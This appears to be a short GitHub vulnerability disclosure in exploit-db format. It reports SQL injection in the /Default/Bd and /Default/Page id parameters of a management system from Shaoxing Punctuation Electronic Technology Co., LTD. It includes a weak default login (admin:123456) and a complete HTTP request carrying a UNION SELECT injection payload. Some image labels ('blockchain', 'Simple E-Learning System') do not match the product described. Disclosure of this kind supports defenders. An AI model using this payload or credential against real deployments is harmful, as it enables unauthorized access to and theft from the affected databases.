Skip to content

Latest commit

 

History

History
31 lines (25 loc) · 1.4 KB

SQL injection exists in the background management system Default of Shaoxing Punctuation Electronic Technology Co., LTD.md

File metadata and controls

31 lines (25 loc) · 1.4 KB

Exploit Title: SQL injection exists in the background management system /Default/Bd?id and /Default/Page?id of Shaoxing Punctuation Electronic Technology Co., LTD

Date: 2022-12/2

Exploit Author: Peanut886

Vendor Homepage: http://www.xsjczx.com/

Version: background management system of Shaoxing Punctuation Electronic Technology Co., LTD

Tested on: windows10 + phpstudy + burpsuite

Description

Weak password: admin:123456 SQL injection exists in the background management system /Default/Bd?id and /Default/Page?id of Shaoxing Punctuation Electronic Technology Co., LTD

Payload used:

GET /Default/Bd?id=-e7fa628182201505181659430599563%27union%20select%201,2,3,4,5,6,7%20--+ HTTP/1.1
Host: TARGET:PORT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=pjcyha1p55kts5fkgesrgehn
Upgrade-Insecure-Requests: 1

Returns part of the package

![blockchain](https://github.com/Peanut886/Vulnerability/blob/main/imgs/2022-12-2-1.jpg https://github.com/Peanut886/Vulnerability/blob/main/imgs/2022-12-2-2.jpg https://github.com/Peanut886/Vulnerability/blob/main/imgs/2022-12-2-3.jpg "Simple E-Learning System")